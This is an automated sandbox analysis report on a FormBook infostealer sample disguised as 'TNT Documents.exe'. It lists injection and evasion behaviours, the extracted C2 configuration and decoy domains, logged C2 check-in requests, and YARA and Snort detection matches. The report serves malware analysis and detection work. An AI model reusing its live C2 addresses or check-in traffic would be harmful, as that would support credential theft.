
Windows Analysis Report TNT Documents.exe

Overview

General Information

Sample Name: TNT Documents.exe
Analysis ID: 532859
MD5: f943d9ee79559042bfff9b4e55270cfa
SHA1: 7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256: 2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
Tags: exe, Formbook, TNT


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TNT Documents.exe (PID: 4548 cmdline: "C:\Users\user\Desktop\TNT Documents.exe" MD5: F943D9EE79559042BFFF9B4E55270CFA)
    • TNT Documents.exe (PID: 6400 cmdline: {path} MD5: F943D9EE79559042BFFF9B4E55270CFA)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6268 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 1148 cmdline: /c del "C:\Users\user\Desktop\TNT Documents.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x6b18:$sqlite3text: 68 38 2A 90 C5
  • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(29 further memory dump entries are not shown on this page)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.TNT Documents.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.TNT Documents.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.TNT Documents.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
7.0.TNT Documents.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.TNT Documents.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further unpacked PE entries are not shown on this page)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


          AV Detection:

Found malware configuration
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: TNT Documents.exe | ReversingLabs: Detection: 46%
Yara detected FormBook
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd | Avira URL Cloud: Label: malware
Source: http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd | Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: TNT Documents.exe | Joe Sandbox ML: detected
Source: 7.2.TNT Documents.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: TNT Documents.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: TNT Documents.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_06B103E0
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_06B10494
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_06B103D1
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then pop edi | 7_2_0040C3AE
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then pop edi | 7_2_00415681
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi | 17_2_0331C3AE
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi | 17_2_03325681

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe | Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe | Network Connect: 51.255.30.106 80
Source: C:\Windows\explorer.exe | Network Connect: 119.18.54.99 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe | Domain query: www.coached.info
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.floridanratraining.com/how6/
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.cortepuroiberico.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.specialtyplastics.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.metronixmedical.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1 | Host: www.coached.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 209.17.116.163 209.17.116.163
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 02 Dec 2021 17:59:48 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61a4f026-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.comx
Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designerss
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com=
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comF(
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comI.TTF
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comals
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comcomo?
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comitud
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comX
Source: TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.c
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnG
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cna
Source: TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnaX
Source: TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnar
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/.comp
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
